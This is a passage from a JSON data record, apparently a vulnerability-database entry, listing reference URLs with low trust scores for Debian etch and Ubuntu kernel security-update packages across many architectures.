        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc_2.6.18.dfsg.1-18etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.18etch3.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-powerpc_2.6.18.dfsg.1-18etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-mips_2.6.18.dfsg.1-18etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-686_2.6.18.dfsg.1-18etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-powerpc_2.6.18.dfsg.1-18etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r4k-kn04_2.6.18.dfsg.1-18etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-alpha_2.6.18.dfsg.1-18etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen_2.6.18.dfsg.1-18etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-486_2.6.18.dfsg.1-18etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-18etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sparc64-smp_2.6.18.dfsg.1-18etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-18etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-686_2.6.18.dfsg.1-18etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-itanium_2.6.18.dfsg.1-18etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r5k-cobalt_2.6.18.dfsg.1-18etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen_2.6.18.dfsg.1-18etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-18etch3.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.18_2.6.18.dfsg.1-18etch3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sparc32_2.6.18.dfsg.1-18etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r4k-ip22_2.6.18.dfsg.1-18etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-generic_2.6.18.dfsg.1-18etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-18etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-amd64_2.6.18.dfsg.1-18etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-686-bigmem_2.6.18.dfsg.1-18etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-mckinley_2.6.18.dfsg.1-18etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s390_2.6.18.dfsg.1-18etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-k7_2.6.18.dfsg.1-18etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-sparc_2.6.18.dfsg.1-18etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-18etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.18etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-qemu_2.6.18.dfsg.1-18etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-iop32x_2.6.18.dfsg.1-18etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-k7_2.6.18.dfsg.1-18etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc_2.6.18.dfsg.1-18etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-sparc64_2.6.18.dfsg.1-18etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-amd64_2.6.18.dfsg.1-18etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-18etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r4k-ip22_2.6.18.dfsg.1-18etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-ixp4xx_2.6.18.dfsg.1-18etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-arm_2.6.18.dfsg.1-18etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-18etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r3k-kn02_2.6.18.dfsg.1-18etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.18-6_2.6.18.dfsg.1-18etch3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-amd64_2.6.18.dfsg.1-18etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-qemu_2.6.18.dfsg.1-18etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-18etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc-miboot_2.6.18.dfsg.1-18etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-amd64_2.6.18.dfsg.1-18etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-mckinley_2.6.18.dfsg.1-18etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-smp_2.6.18.dfsg.1-18etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sparc64_2.6.18.dfsg.1-18etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r5k-ip32_2.6.18.dfsg.1-18etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-18etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-ia64_2.6.18.dfsg.1-18etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.18etch2.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-smp_2.6.18.dfsg.1-18etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-generic_2.6.18.dfsg.1-18etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s3c2410_2.6.18.dfsg.1-18etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.18_2.6.18.dfsg.1-18etch3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-powerpc64_2.6.18.dfsg.1-18etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-prep_2.6.18.dfsg.1-18etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-18etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc-smp_2.6.18.dfsg.1-18etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sparc64-smp_2.6.18.dfsg.1-18etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc64_2.6.18.dfsg.1-18etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.18etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-amd64_2.6.18.dfsg.1-18etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390_2.6.18.dfsg.1-18etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-rpc_2.6.18.dfsg.1-18etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver_2.6.18.dfsg.1-18etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc64_2.6.18.dfsg.1-18etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-18etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-18etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-footbridge_2.6.18.dfsg.1-18etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.18etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.18etch2.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-ixp4xx_2.6.18.dfsg.1-18etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-686_2.6.18.dfsg.1-18etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-s390x_2.6.18.dfsg.1-18etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.18etch2.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-rpc_2.6.18.dfsg.1-18etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390-tape_2.6.18.dfsg.1-18etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc-smp_2.6.18.dfsg.1-18etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-s390_2.6.18.dfsg.1-18etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-686-bigmem_2.6.18.dfsg.1-18etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc-miboot_2.6.18.dfsg.1-18etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-i386_2.6.18.dfsg.1-18etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc64-smp_2.6.18.dfsg.1-18etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-18etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-18etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-s390x_2.6.18.dfsg.1-18etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-mipsel_2.6.18.dfsg.1-18etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-footbridge_2.6.18.dfsg.1-18etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390x_2.6.18.dfsg.1-18etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sparc64_2.6.18.dfsg.1-18etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc64_2.6.18.dfsg.1-18etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc64_2.6.18.dfsg.1-18etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-iop32x_2.6.18.dfsg.1-18etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-686_2.6.18.dfsg.1-18etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-sparc64_2.6.18.dfsg.1-18etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver_2.6.18.dfsg.1-18etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-18etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc_2.6.18.dfsg.1-18etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.18_2.6.18.dfsg.1-18etch3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-legacy_2.6.18.dfsg.1-18etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-powerpc_2.6.18.dfsg.1-18etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-486_2.6.18.dfsg.1-18etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-amd64_2.6.18.dfsg.1-18etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-686_2.6.18.dfsg.1-18etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://packages.debian.org/\u003cpkg\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-18etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-k7_2.6.18.dfsg.1-18etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.18etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-amd64_2.6.18.dfsg.1-18etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-amd64_2.6.18.dfsg.1-18etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/xorg-driver-fglrx_7.1.0-8.34.8+2.6.20.6-17.31_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/linux-backports-modules-2.6.22-15-386_2.6.22-15.16_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.22/linux-restricted-modules-2.6.22-15-rt_2.6.22.4-15.11_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-15-lpia-di_2.6.22-15.54_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/linux-backports-modules-2.6.22-15-powerpc64-smp_2.6.22-15.16_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/scsi-firmware-2.6.22-15-generic-di_2.6.22-15.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/acpi-modules-2.6.22-15-386-di_2.6.22-15.54_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/xorg-driver-fglrx-dev_7.1.0-8.34.8+2.6.20.6-17.31_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-17-generic_2.6.20-17.36_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/vmware-tools-kernel-modules-2.6.20-17_2.6.20.6-17.31_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/nic-restricted-modules-2.6.22-15-generic-di_2.6.22.4-15.11_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-amd64-k8_2.6.15-52.10_amd64.deb"
      },
      {
        "trust": 0.1,
